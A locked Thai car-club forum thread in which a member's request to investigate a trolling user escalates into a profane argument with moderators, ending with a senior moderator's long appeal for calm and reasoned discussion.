หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
cakecity10

ชื่อเล่น: เค้ก

เข้าร่วม: 30 กันยา 2011
ตอบ: 98

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 112
ให้คำขอบคุณ: 157
พุธ, 1 สิงหา 2012 14:24 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
พอกูไม่มาตอบก็ว่ากูหนี พอกูมาตอบก็ว่ากูเสนอหน้า ตกลงคุณ-มึง จะเอายังงัย??? เก่งกับผู้หญิงจริงๆเลยนะ ที่ไม่ตอบคือ อยากให้จบงัย ไม่รู้จะชักแม่น้ำทั้ง5 มาทำไม
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 1 สิงหา 2012 14:30 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
มาขี้ไว้แล้วไม่เช็ดเนี้ยนะ อยากให้จบแบบนี้อ่ะนะ

ผมไม่ได้แค่เก่งกับผู้หญิงครับ ผู้ชาย คนแก่ เด็ก กระเทย ตุ๊ด เกย์ ถ้าทำผิดมา อ้างเหตุผลข้างๆคูๆกับผม ผมซัดหมดครับ

ถ้าผมผิด ผมขอโทษไปแบบไม่เกรงใจเลย เด็กผมก็ยกมือไหว้ได้

เอาคำว่าผู้หญิงมาอ้าง แล้วมาด่า ปาวๆๆๆ แบบนี้ถูกเหรอ!
ได้รับคำขอบคุณจาก: NeaT ES.  PAE KUNG  Turngkung P 11  TUI_PeTiTe  Nung_Sodapop  KAATO  kaisuh  koobe  sukhothai  Bonuses01  battery3k  moonoy 
NeaT ES.

เข้าร่วม: 10 ตุลา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4530
ให้คำขอบคุณ: 1984

สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 1 สิงหา 2012 14:30 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
มาเต็ม อารมณ์ล้วน
ได้รับคำขอบคุณจาก: tochi229 
cakecity10

สมาชิกสับสน
สมาชิกสับสน

พุธ, 1 สิงหา 2012 14:31 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
hacker พิมพ์ว่า:
cakecity10 พิมพ์ว่า:

อ้างอิงจาก:

cakecity10 พิมพ์ว่า:
ขอบคุณ คุณป๋อง นะคะ ที่อุตส่าห์ออกมาโพสเอาป่านนี้ มาโพสตอนที่กระทู้นี้ผ่านมาจน3หน้าแล้ว จนคนอ่านเริ่มเปลี่ยนประเด็นไปตามที่ตัวเองคิดแล้ว ซึ่งก็เป็นการกระทำของผู้ดูแลเว็ปบอร์ดนี้ เหมือนๆกับหลายๆครั้ง หลายๆกระทู้ที่เคยมีปัญหาลักษณะนี้มาแล้ว ก่อนหน้าที่เราจะมาเปิดกระทู้นี้ก็ได้พยายามสอบถามแอดมินบางท่านไปว่าในเมื่อรู้ว่า Log in GooGrien เป็นผู้มีความผิด แล้วดูจากพฤติกรรมการโพส ถ้าคนที่มีความคิด ก็รู้ว่าเป็นการป่วนกระทู้ นอกจากพวกเดียวกันที่จะดูไม่ออก สังเกตุได้จากหลายคนที่เค้าเข้ามาโพสถามต่อว่า Log inนี้ มาโพสเพื่ออะไร ขุดคุ้ยกระทู้ของคนอื่น และเป็นกระทู้ที่เปิดโดยคนๆเดียวกันมาเพื่ออะไร ไม่ใช่ว่าไม่มีใครสงสัย เพียงแต่ไม่มีใครมาเปิดกระทู้ถามเหมือนเรา ก็ได้รับคำตอบจากผู้ดูแลบอร์ดบางท่านมาว่า ใช่ เค้ามีความผิด แล้วUser ของเค้าจะทำให้ผู้ดูแลติดตามทุกโพสของเค้า ก็เลยถามต่อไปว่า แล้วในเมื่อรู้ ว่าเค้ามีความผิด แล้วการโพสก็ไม่เหมาะสม แล้วทำไมยังปล่อยให้เค้าโพสต่อไป ตรงนี้ก็ยังไม่ได้รับคำตอบ เพราะวันนั้นแชทน่าจะมีปัญหา ก็เลยเลือกที่จะมาเปิดกระทู้ถามผู้ดูแล เพราะคิดว่าการตอบผ่านกระทู้น่าจะช่วยคลายความสงสัยให้คนอื่นได้ด้วย แต่ไม่คิดว่าไอ้ตัวป่วนมันจะตามมาป่วนอีก แล้วผู้ดูแลก็นิ่งเฉย ปล่อยให้เกิดปัญหาแล้วก็ออกมาโพสต่อว่าเรา ทำให้ตัวเองดูดี ให้คนอ่านเห็นใจทีมงานผู้ดูแลเว็ปบอร์ด กลายเป็นเราผิดที่มาแสดงความคิดเห็น เอะอะก็จะแบน จะบล็อคกระทู้ ทำตัวเป็นมาเฟียเว็ปบอร์ดหรอคะ? คุณเคยบอกนะว่าโพสอะไรให้ให้เกียรติผู้ดูแลเว็บบ้าง แต่ดูข้อความของคุณสิ ให้เกียรติเราป่าว??? เราถามหน่อยนะ ว่ากระทู้นี้ เราไปว่าอะไรคุณหรอ ที่คุณมาถามว่าจะให้พวกคุณทำยังงัย เราแค่บอกว่าผู้ดูแลช่วยตรวจสอบหน่อยค่ะ แต่ถ้าคุณถามเราตอนนี้ว่าจะให้พวกคุณทำยังงัยอีก เอาเป็นว่า พวกคุณไปดูแลคนของพวกคุณให้ดีๆ อย่าให้ไปกร่างกับคนอื่นเค้าก็พอแล้วล่ะ อย่าคิดว่าเป็นบ้านของตัวเองแล้วจะทำอะไรก็ได้ เพราะเดี๋ยวทีมงานผู้ดูแลเว็บบอร์ดก็จะเหลือแต่พวกเดียวกันมาอวยกันเอง เหมือนที่เป็นอยู่ทุกวันนี้น่ะ ส่วนเรื่องที่จะแบนเราไม่ต้องลำบากหรอก ตั้งแต่วันนี้ เราขอออกจากการเป็นสมาชิก และจะไม่มีการสมัครเข้ามาใหม่ใดๆทั้งสิ้น เพราะเสียความรู้สึกกับผู้ดูแลเว็ปบอร์ดนี้มากๆ ถ้าคุณจะกรุณาก็ช่วยบล็อกกระทู้นี้ด้วยแล้วกันนะ เพราะไม่อยากให้เป็นเครื่องมือของคนบางพวกที่เข้ามาตีหน้าซื่อให้คนอื่นเห็นใจน่ะ

เอานะ ผมตอบเป็นข้อนะ กลับมาตอบผมเป็นประเด็นนะ

1. การที่ Reply โผล่ไป 3-4 หน้าไม่ใช่เรื่องแปลกนะ อย่าเอาเป็นตัวชี้วัดว่ามันผ่านมานานๆไม่นานไม่ได้

2. คนอ่านเปลี่ยนประเด็น อันนี้ สิทธิส่วนบุคคล ขึ้นอยู่กับวิจารณาญของแต่ละท่าน บางคนยังขำๆกับ User googrien เลย

3. การสอบถาม คุณถามมาผมตอบไป "ใช่ เค้ามีความผิด แล้วUser ของเค้าจะทำให้ผู้ดูแลติดตามทุกโพสของเค้า" ซึ่งผมก็ดู
    และไม่ได้รับคำถามต่อจากนั้น

4. แล้วที่บอกว่า ตรงนี้ก็ยังไม่ได้รับคำตอบ เพราะวันนั้นแชทน่าจะมีปัญหา ก็เลยเลือกที่จะมาเปิดกระทู้ถามผู้ดูแล
    [ทีงี้ไม่โทรมานะ แล้วบอกให้ผมโทรไป] ผมมนุษย์เงินเดือนนะ ทำงานบริษัท ขอเงินพ่อเติมโทรศัพท์

5. เอะอะ จะบล็อก จะแบน .... user ที่แบน 100 เปอร์เซนต์ เป็นพวก เข้ามาโฆษณาลูกโซ่ กะ ปั้ม Thk
    เรื่องบล็อก เอามาดูหน่อยสิอันไหนมั่ง มีไม่ถึง 5 Post เลยครับ ตลอด 4 ปีที่ผ่านมา

6. ข้อความของใครไม่ให้เกียรติคุณ ขอดูหน่อย ผมเห็นแค่มันเป็นการทะเลาะกันระหว่างคุณกับกูเกรียน ซึ่ง จะให้ตัดสิน ผมว่า ผิดทั้งคู่

7. เรื่องตรวจสอบดูแล ผมทำให้ทุกคนครับ ไม่ได้ทำให้แค่คุณ ทำตลอดอยู่แล้ว

8. คนของคุณ ในที่นี้ คุณหมายถึงใคร ผมถามหน่อยเหอะ คุณเอาอะไรมาคิด เอาอะไรมาชี้วัด

9. เรื่องออกจากสมาชิก มันก็สิทธิของคุณนะครับ

ตอบผมมาหน่อย ผมจะรีบกลับต่างจังหวัด หยุดยาวหลายวัน

เออ...สรุปคุณถูกที่สุด ดีที่สุด เราไม่เห็นด้วยกับคุณ เราผิด จบป่ะ แล้วเราขอร้องเถอะนะ เลิกโพสได้แระ วนไปวนมาอยู่ที่เดิมนี่แหละ เห็นใจคนอื่นเค้าบ้าง เค้าคงโคตรรำคาญเหมือนกัน อะไรกันนักหนาวะ พอกรูโพสไม่เลิก แม่ง..ก็โวยวาย พอกรูขอออกจากการเป็นสมาชิก แม่ง...ตามรังควานกรูอยู่ได้ ไปแล้วนะ...มีอะไรต้องทำอีกเยอะ บอกตามตรง แม่งก็ไร้สาระด้วยกันทั้งหมดแหละ....

ยอมเหรอ ไม่มีเหตุผลแบบผมเหรอ ไหนว่าตัวเองมีเหตุผล มีวุฒิภาวะ

ทำไมไม่อ้างกันตามเหตุผล

ผมเชื่อว่าคนรำคาญก็มี แต่คนที่อยากรู้เหตุผลมันเยอะกว่า

พอผมเอาต้นเหตุมาพูด คุณหนีเหรอ

คุณหยาบมากูหยาบไปนะ คุณออกจากสมาชิกแล้วเสนอหน้ามาอีกทำหอกอะไร กูตามรังควาญคุณแบบไหนครับ

กูมาชี้แจงถึงเหตุผลที่คุณออกมาเห่า ปาวๆๆๆ อยู่นี่ให้คนอื่นรู้ครับ

คุณคิดว่าคุณถูกคุณเอาเหตุและผลมาพูดกับกูคับ แต่ถ้าคุณหนีแบบนี้ โดนตราหน้า ผู้ดูแลก็ช่วยห่าอะไรไม่ได้นะครับ

อย่าคิดว่ากูได้สาระแบบคุณครับ คุณมันไม่มีค่าอะไรในบอร์ดหรอก อย่าเอามาเทียบกับผม

ปล. แทนตัวเองว่ากู แต่แทนคนอื่นว่าคุณ อย่างน้อยก็ไม่หยาบมากนะ

ไม่ต้องมาชี้แจงเหตุผลเเทนกูหรอก เพราะกูชี้แจงไปแล้ว แล้วที่กูมาเห่าอยู่เนี่ย ก็เพราะมีคู่เห่าด้วยงัย เห่าพาดพิงคนอื่นเค้าไปทั่ว แล้วก็ไม่มีใครเค้าเอาใคร ไปเทียบกับใครหรอกนะ อย่าพูดเองเออเองดิ
YINDEE

ชื่อเล่น: ต๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1516

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3233
ให้คำขอบคุณ: 3684

ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 1 สิงหา 2012 14:31 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
โทรไปทำไม เปลืองตังค์ ไร้สาระ ใครว่าผมเก่งในบอร์ด ตัวจริงผมก็เก่งนะ มีเรื่องมีราวในบอร์ด คุยในบอร์ด ให้คนอื่นเค้าตัดสินดีกว่า

ขอโทษครับ ผมไปแหกตาดูหลายรอบแล้วนะครับ มันพาดพิงนะครับ จริงๆ หรือคุณหน้ามืดตามัวขนาดมองไม่เห็น

แล้วการอัพกระทู้ คุณไปแหกตาดูในมารยาทการใช้บอร์ดด้วยนะครับ มีกันมาตั้งแต่ปี 2008 สมัครมาใหม่เคยดูรึป่าวครับ

หรือไม่มีมารยาท เก่งแต่ในบอร์ดไปวันๆ ไม่เคยทำอะไรที่มีประโยชน์ต่อเวปเลย หาผลประโยชน์ไปวันๆแล้วมา วีนๆๆ มันถูกเหรอ

ผมชี้แจงเป็นข้อๆ

คำว่า "พวกคุณ" ที่คุณบอก หมายถึงใคร หมายถึงทุกคนในบอร์ดเหรอ

ไม่อยากอยู่ก็เนรเทศตัวเองออกไปครับ

ผมรู้แต่ว่าคุณไม่เคยทำประโยชน์อะไรให้บอร์ด ไม่เคยทำประโยชน์อะไรให้คลับ ไม่เคยทำประโยชน์อะไรให้เวป เปลือง Database ป่าวๆ

ชัดเจน!   เอาใจกรูไป! เอางัยใช้งานเมื่อไหร่บอกพี่นะน้อง  รับรอง พี่ไม่ให้น้องเดียวดายจิงๆ
ได้รับคำขอบคุณจาก: hacker  -ake_ipc- 
hacker

พุธ, 1 สิงหา 2012 14:32 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ประเด็น ที่คุณถามมา ผมตอบหมด คุณเคยตอบผมซักประเด็นมั้ย !!
ได้รับคำขอบคุณจาก: Bonuses01 
cakecity10

สมาชิกสับสน
สมาชิกสับสน

พุธ, 1 สิงหา 2012 14:34 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
ประเด็น ที่คุณถามมา ผมตอบหมด คุณเคยตอบผมซักประเด็นมั้ย !!

ตอบไปแล้วเข้าใจป่าว...........
Wal2n_ES

ชื่อเล่น: ว่าน

ตอบ: 615

Guru ES
Guru ES

ได้รับคำขอบคุณ: 812
ให้คำขอบคุณ: 819

ปี: 2003
พุธ, 1 สิงหา 2012 14:40 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
บรู๊วววววววววววววววว ว ววว ววว ว 
Big Bad Wolf Big Bad Wolf Big Bad Wolf 
บรู๊วววววววววววววววววววววววววววว ว ว
ได้รับคำขอบคุณจาก: PAE KUNG  TUI_PeTiTe 
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

ปี: 2005
พุธ, 1 สิงหา 2012 14:40 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
Ton- พิมพ์ว่า:

นาย googrien มาโพสท์เพราะความเกรียน แต่คุณ cakecity เอามาคิดไปเองโน่นนี่ สุดท้ายมาพาลกับ admin จนตัวเองขอออกจากบอร์ดไปเอง

ป่านนี้นาย googrien นั่งหัวเราะท้องแข็งแล้วมั๊ง ลองเอาไปคิดให้ดีๆ

หลายๆเรื่องที่ผ่านมาในชีวิตก็หัดปล่อยวางบ้างเถอะครับ

ES2.0 พิมพ์ว่า:

ปล่อยวางกันซะบ้างเถอะคับต่างคนต่างมีหน้าที่ของตัวเองแอดมินคงไม่ได้มีเวลามานั่งเฝ้าบอร์ด
    ปรึกษาหารือกันด้วยเรื่องคนๆเดียวหรอกนะ เค้าคงมีงานมีการทำอย่างอื่นเป็นหลักเหมือนหลายๆคน
    นั่นแหละ มาอยุ่ดูแลที่นี่เป็นหน้าที่เสริมที่ไม่มีรายได้เพิ่มเติม ไม่ว่าจะคนที่ป่วนหรือคนที่รำคาญ
    ควรจะมีมารยาทในการโพส และเคารพกฏกติกากันบ้างนะคับ อยากให้บ้านนี้อบอุ่นเหมือนเดิมแค่นั้น

zan พิมพ์ว่า:

Ton- พิมพ์ว่า:
นาย googrien มาโพสท์เพราะความเกรียน แต่คุณ cakecity เอามาคิดไปเองโน่นนี่ สุดท้ายมาพาลกับ admin จนตัวเองขอออกจากบอร์ดไปเอง

ป่านนี้นาย googrien นั่งหัวเราะท้องแข็งแล้วมั๊ง ลองเอาไปคิดให้ดีๆ

หลายๆเรื่องที่ผ่านมาในชีวิตก็หัดปล่อยวางบ้างเถอะครับ

กลายเป็น . . . . เหยื่ออารมณ์

mugen พิมพ์ว่า:
ไอ้หมอนี้อีกละคราวที่แล้วก้อเอารูปผมไปเป็นรูปโปรไฟล์มัน
 นั้นสิทำไมยังล็อคอินได้อีก น่าคิดเนอะ

มันผิดกฏข้อไหนครับ อันนี้เอาจริงๆ ผู้ดูแลก็ไม่รู้ว่ารูปใครเป็นใคร รู้แต่คน บางคนเอารูปมิยาบิมายังมีเลย จะแบนเค้าก็ต้องมีเหตุผล

ถ้าแบนเค้า ไม่มีเหตุผล เดี๋ยวโดนกล่าวหา "เป็นมาเฟีย" คุณมาช่วยผมแก้ต่างป่าวคับ

แล้วที่ทางผู้ดูแลลงไว้ว่ามีความผิด ก็เพราะจะได้ตามทุก Reply ของ User นั้นได้ครับ ชี้แจงมา ณ ที่่นี้เลย

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

กรณีที่สอง ที่สอบถามอะสอบถามผมเอง ที่แชทมา ซึ่งก็ถูก หลังจากตอบว่า

"ทางผู้ดูแลลงไว้ว่ามีความผิด ก็เพราะจะได้ตามทุก Reply ของ User นั้นได้ครับ" ก็เป็นแบบนี้จริงๆ หลังจากนั้นก็ไม่มีข้อความอะไรมาอีก

การล็อกกระทู้ ลบ กระทู้ เกิดจากการพิจารณาของผู้ดูแล ที่ทางพวกคุณเรียกว่า "มาเฟีย"

โดยถือกฏการพิจารณา กฎกติกามารยาทในการใช้บอร์ด ซึ่งลงไว้เมื่อปี 2008

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

ผมเองก็ตามกระทู้ ตาม Reply ตลอด น้อยครั้งมาก ไม่ถึงหนึ่งเปอร์เซนต์ด้วยซ้ำที่จะลบ หรือ ล็อก เพราะเป็นที่สาธารณะ เป็นสิทธิของทุกคน

wut-chiangmai พิมพ์ว่า:
เขาป่วนกระทู้จริง แต่ยังไม่ได้สร้างความเสียหายชัดเจน

แอดมินน่าจะคิดประมาณนี้ ถึงได้กำหนดสถานะ "ผู้ใช้ที่มีความผิด" เพื่อติดตามการใช้งานอย่างใกล้ชิด

มันก็ดูเหมาะสมกับเหตุการณ์อยู่แล้วนะครับ

จะให้แอดมิน  "ลบ" "แบน" "บล็อก" ไปเลย เดี๋ยวก็โดนว่าอีก

ผู้ใช้ท่านอื่น ๆ เขาก็สงสัย เกี่ยวกับคนป่วนกระทู้เหมือนกันทั้งนั้น ตัวผมก็สงสัย
แต่ผมไม่ได้มีอารมณ์ร่วม ( อารมณ์โกรธนะครับ ) ไปกับการโพสเกรียนของตัวเขา เพราะมันก็ยังถือเป็นสิทธิที่พึงกระทำได้ ภายใต้กฎระเบียบของเว็บบอร์ดแห่งนี้

"โทสะ" อยู่เหนือ "สติ" ถึงได้เป็นแบบนี้

koobe พิมพ์ว่า:
ขอหละครับ นิ่งๆ ใจเย็นๆ กันนะ เรื่องไม่เป็นเรื่อง (อีกสัก ปี สองปี แล้วทุกๆท่านที่มีอารมณ์กับเรื่องเหล่านี้ลองนึกทบทวนเรื่องนี้ดูครับ แล้วจะบอกว่าไน่น่าเลยเรา อายจัง เราทำไปได้ไง เหมือนเด็กๆเค้าเล่นกันนะ เฮ้อ///..................ขอเถอะครับ

เข้ามาอ่านทุกวัน ว่าจะไม่โพสแล้วน๊าาาา แต่ก็ขอสักหน่อย

ก่อนอื่นผมขอกดทั้งThanks ทั้งLike ให้กับQuote ทั้งหมดนี้ จากใจเลย อ่านแล้วชอบทัศนะคติกึ๋นๆแบบนี้

กระทู้นี้ หรือ กระทู้ไหนๆ ผู้ดูแลอ่านกันเกือบทุกคนและทุกวัน(เมื่อว่างจากงานประจำ) ไม่ได้ไม่สนใจ หรือ ปล่อยปละ

จะมีการปรึกษาหารือกันทุกวัน(เน้นเลยว่า..ทุกวัน)
และการตัดสินใจสุดท้าย คือ "ผมเอง"ที่จะออกมาแนวทางไหน

ที่ก่อนหน้านี้ ไม่มีผู้ดูแลเข้ามาตอบ ไม่ใช่ว่า..ไม่เข้ามาอ่าน แต่เห็นว่ายังคุยกันแบบออกรสออกชาติและอยู่ในกติกาที่ยังรับได้

กับคุณ
GooGrien (ขออนุญาตเอ่ยนาม) ทางผู้ดูแล ก็เคยPM. เตือนจนเขาเองยอมรับในสิ่งที่ทำผิด และถูกเปลี่ยนสถานะ

หลายคนคงสงสัยว่า..ทำไมสมาชิกที่ได้ตำแหน่ง "ผู้ใช้นี้มีความผิด" ยังมาโพสได้ ยังมาเล่นได้

มีครับ สมาชิกที่ได้รับตำแหน่งนี้ ยังมาเล่นได้ปกติ เพียงแค่ถูกคาดโทษหรือตักเตือน (ลองหาดูครับ มีสมาชิกบางท่านได้รับตำแหน่งนี้อยู่)

กับกรณีนี้ คุณ
cakecity10 (ขออนุญาตเอ่ยนาม) แจ้งว่าให้ตรวจสอบคุณGooGrien ซึ่งผมเองก็ดูแล้วว่า เขาเข้าไปตอบกระทู้เย๊อะจริง และเป็นข้อความซ้ำๆ ผมเองก็สอบถามไป และได้รับการอธิบายแบบค่อยข้างชัดเจน (ซึ่งอันนี้ผมคงไม่นำมาเปิดเผยนะครับ ใครอยากรู้ PMมาครับ)

ผมก็ปรามๆไป อย่าทำอะไรเกรียนๆจนผมต้องปิดชื่อคุณ เพราะเดี๋ยวคุณก็สมัครมาใหม่ มาเอะอะโวยวาย

มีสิ่งหนึ่งที่แตกต่างกันของ
ผู้ดูแล กับ สมาชิก ในเชิงความคิดและการแสดงออก คือ การมอง "ในสิ่งที่ไม่ถูกกฏ หรือ ในสิ่งที่ไม่ถูกใจ"

หลายท่านสามารถเอะอะโวยวายได้ เมื่อเจอสิ่งไม่ถูกใจ แต่สำหรับผู้ดูแลแบกรับทุกความไม่ถูกใจ แต่พูดอะไรมากไม่ได้ เพราะเดี๋ยวจะโดนกล่าวหาเป็นฝ่ายนั้นบ้าง เป็นฝ่ายนี้บ้าง ผู้ดูแลเกรียนบ้าง โอ๊ยสาระพัดตำแหน่งที่จะประเคนมาให้

ณ เวลานี้ มีผู้ดูแล ออกมาโพสกันบ้างแล้ว ซึ่งผมเองก็คงห้ามอะไรมิได้ เพราะผู้ดูแลก็คือ "คน" มีอารมณ์ มีความรู้สึก

ได้โปรดเถ๊อะครับ ผู้ดูแลเหล่านี้ ผมเป็นคนขอร้องให้มาช่วยๆผมเอง และทุกคนที่ผมขอร้องมา ผมใตร่ตรองถี่ถ้วนแล้วว่า..ทุกคนมีความเหมาะสม และ ทุกคนทำหน้าที่ตามกฏ

สุดท้าย..กระทู้นี้ จากการตรวจสอบUserคนนึง กลับกลายว่าจขกท.มาเป็นประเด็นกับทางผู้ดูแลไปซะอีก และต้องขอลาออกจากบ้านหลังนี้ไปซะงั้น

อันนี้ไม่ได้ประชดและไม่ได้ไล่นะครับ ด้วยความบริสุทธิ์ใจ..จากใจจริง ถ้าอยู่แล้วไม่มีความสุข เราก็ควรไปหาที่ที่มีความสุขอยู่..อ่ะถูกแล้วครับ เป็นผมผมก็ทำเช่นนั้น

ในชีวิตจริงมีเรื่องมากมายก่ายกองที่ต้องคิด ต้องทำ ...งานหลักเอ่ย รถพัง แม่ป่วย เมียงอแง กิ๊กคิดถึง ลูกร้องจะเอาBenTen แข่งบอลแล้วได้แชมป์^^ โอ๊ย...เย๊อะแยะมากมายก่ายกอง บางทีในโลกOnline ปล่อยวางบ้าง อย่าไปซีเรียสกับมันมาก เพราะถ้าเก็บมาคิด ยิ่งทำให้จิตใจไม่เป็นสุข เหมือนเรา..ติดกับดัก..ทางอารมณ์ที่เขาวางไว้

จะเกรียน หรือไม่เกรียน จะผู้ดูแล หรือสมาชิก ก็คุยกันด้วยเหตุและผลกันนะ โชว์กึ๋น มิใช่..โชว์อารมณ์  (ผมโรคจิตมั๊ง ชอบอ่าน แต่ถ้าเล่นกันแรงเกินงาม ผมจะดำเนินมาตรการเอง..ตามเห็นสมควร)

มองโลกในด้านดี บางทีอาจจะเห็นได้ว่า..ไอ้สิ่งที่เราไม่ถูกใจอยู่ ก็แค่เรื่องจิ๊บจ๊อย

ถ้าอยากจะชนะใคร ต้องชนะใจตัวเองก่อน แล้วสิ่งที่เราไม่ถูกใจ...มันจะไร้ค่าไปเอง

"หากไม่รู้จักเจ็บปวด ก็คงไม่ซึ้ง ถึง ความ สุข ใจ"
TUI_PeTiTe

เข้าร่วม: 24 สิงหา 2008
ตอบ: 3394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 11353
ให้คำขอบคุณ: 3321

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 1 สิงหา 2012 14:44 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
กูก็มาเฟีย....เป็นมาเฟียที่แจกรูปโป๊ครับ 555555
ได้รับคำขอบคุณจาก: PAE KUNG  NeaT ES.  Ton-  hikaru_kung  K_series  sukhothai 
NeaT ES.

เข้าร่วม: 10 ตุลา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4530
ให้คำขอบคุณ: 1984

พุธ, 1 สิงหา 2012 14:50 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
อ้างอิงจาก:
เข้ามาอ่านทุกวัน ว่าจะไม่โพสแล้วน๊าาาา แต่ก็ขอสักหน่อย

ก่อนอื่นผมขอกดทั้งThanks ทั้งLike ให้กับQuote ทั้งหมดนี้ จากใจเลย อ่านแล้วชอบทัศนะคติกึ๋นๆแบบนี้

กระทู้นี้ หรือ กระทู้ไหนๆ ผู้ดูแลอ่านกันเกือบทุกคนและทุกวัน(เมื่อว่างจากงานประจำ) ไม่ได้ไม่สนใจ หรือ ปล่อยปละ

จะมีการปรึกษาหารือกันทุกวัน(เน้นเลยว่า..ทุกวัน)
และการตัดสินใจสุดท้าย คือ "ผมเอง"ที่จะออกมาแนวทางไหน

ที่ก่อนหน้านี้ ไม่มีผู้ดูแลเข้ามาตอบ ไม่ใช่ว่า..ไม่เข้ามาอ่าน แต่เห็นว่ายังคุยกันแบบออกรสออกชาติและอยู่ในกติกาที่ยังรับได้

กับคุณ
GooGrien (ขออนุญาตเอ่ยนาม) ทางผู้ดูแล ก็เคยPM. เตือนจนเขาเองยอมรับในสิ่งที่ทำผิด และถูกเปลี่ยนสถานะ

หลายคนคงสงสัยว่า..ทำไมสมาชิกที่ได้ตำแหน่ง "ผู้ใช้นี้มีความผิด" ยังมาโพสได้ ยังมาเล่นได้

มีครับ สมาชิกที่ได้รับตำแหน่งนี้ ยังมาเล่นได้ปกติ เพียงแค่ถูกคาดโทษหรือตักเตือน (ลองหาดูครับ มีสมาชิกบางท่านได้รับตำแหน่งนี้อยู่)

กับกรณีนี้ คุณ
cakecity10 (ขออนุญาตเอ่ยนาม) แจ้งว่าให้ตรวจสอบคุณGooGrien ซึ่งผมเองก็ดูแล้วว่า เขาเข้าไปตอบกระทู้เย๊อะจริง และเป็นข้อความซ้ำๆ ผมเองก็สอบถามไป และได้รับการอธิบายแบบค่อยข้างชัดเจน (ซึ่งอันนี้ผมคงไม่นำมาเปิดเผยนะครับ ใครอยากรู้ PMมาครับ)

ผมก็ปรามๆไป อย่าทำอะไรเกรียนๆจนผมต้องปิดชื่อคุณ เพราะเดี๋ยวคุณก็สมัครมาใหม่ มาเอะอะโวยวาย

มีสิ่งหนึ่งที่แตกต่างกันของ
ผู้ดูแล กับ สมาชิก ในเชิงความคิดและการแสดงออก คือ การมอง "ในสิ่งที่ไม่ถูกกฏ หรือ ในสิ่งที่ไม่ถูกใจ"

หลายท่านสามารถเอะอะโวยวายได้ เมื่อเจอสิ่งไม่ถูกใจ แต่สำหรับผู้ดูแลแบกรับทุกความไม่ถูกใจ แต่พูดอะไรมากไม่ได้ เพราะเดี๋ยวจะโดนกล่าวหาเป็นฝ่ายนั้นบ้าง เป็นฝ่ายนี้บ้าง ผู้ดูแลเกรียนบ้าง โอ๊ยสาระพัดตำแหน่งที่จะประเคนมาให้

ณ เวลานี้ มีผู้ดูแล ออกมาโพสกันบ้างแล้ว ซึ่งผมเองก็คงห้ามอะไรมิได้ เพราะผู้ดูแลก็คือ "คน" มีอารมณ์ มีความรู้สึก

ได้โปรดเถ๊อะครับ ผู้ดูแลเหล่านี้ ผมเป็นคนขอร้องให้มาช่วยๆผมเอง และทุกคนที่ผมขอร้องมา ผมใตร่ตรองถี่ถ้วนแล้วว่า..ทุกคนมีความเหมาะสม และ ทุกคนทำหน้าที่ตามกฏ

สุดท้าย..กระทู้นี้ จากการตรวจสอบUserคนนึง กลับกลายว่าจขกท.มาเป็นประเด็นกับทางผู้ดูแลไปซะอีก และต้องขอลาออกจากบ้านหลังนี้ไปซะงั้น

อันนี้ไม่ได้ประชดและไม่ได้ไล่นะครับ ด้วยความบริสุทธิ์ใจ..จากใจจริง ถ้าอยู่แล้วไม่มีความสุข เราก็ควรไปหาที่ที่มีความสุขอยู่..อ่ะถูกแล้วครับ เป็นผมผมก็ทำเช่นนั้น

ในชีวิตจริงมีเรื่องมากมายก่ายกองที่ต้องคิด ต้องทำ ...งานหลักเอ่ย รถพัง แม่ป่วย เมียงอแง กิ๊กคิดถึง ลูกร้องจะเอาBenTen แข่งบอลแล้วได้แชมป์^^ โอ๊ย...เย๊อะแยะมากมายก่ายกอง บางทีในโลกOnline ปล่อยวางบ้าง อย่าไปซีเรียสกับมันมาก เพราะถ้าเก็บมาคิด ยิ่งทำให้จิตใจไม่เป็นสุข เหมือนเรา..ติดกับดัก..ทางอารมณ์ที่เขาวางไว้

จะเกรียน หรือไม่เกรียน จะผู้ดูแล หรือสมาชิก ก็คุยกันด้วยเหตุและผลกันนะ โชว์กึ๋น มิใช่..โชว์อารมณ์  (ผมโรคจิตมั๊ง ชอบอ่าน แต่ถ้าเล่นกันแรงเกินงาม ผมจะดำเนินมาตรการเอง..ตามเห็นสมควร)

มองโลกในด้านดี บางทีอาจจะเห็นได้ว่า..ไอ้สิ่งที่เราไม่ถูกใจอยู่ ก็แค่เรื่องจิ๊บจ๊อย

ถ้าอยากจะชนะใคร ต้องชนะใจตัวเองก่อน แล้วสิ่งที่เราไม่ถูกใจ...มันจะไร้ค่าไปเอง

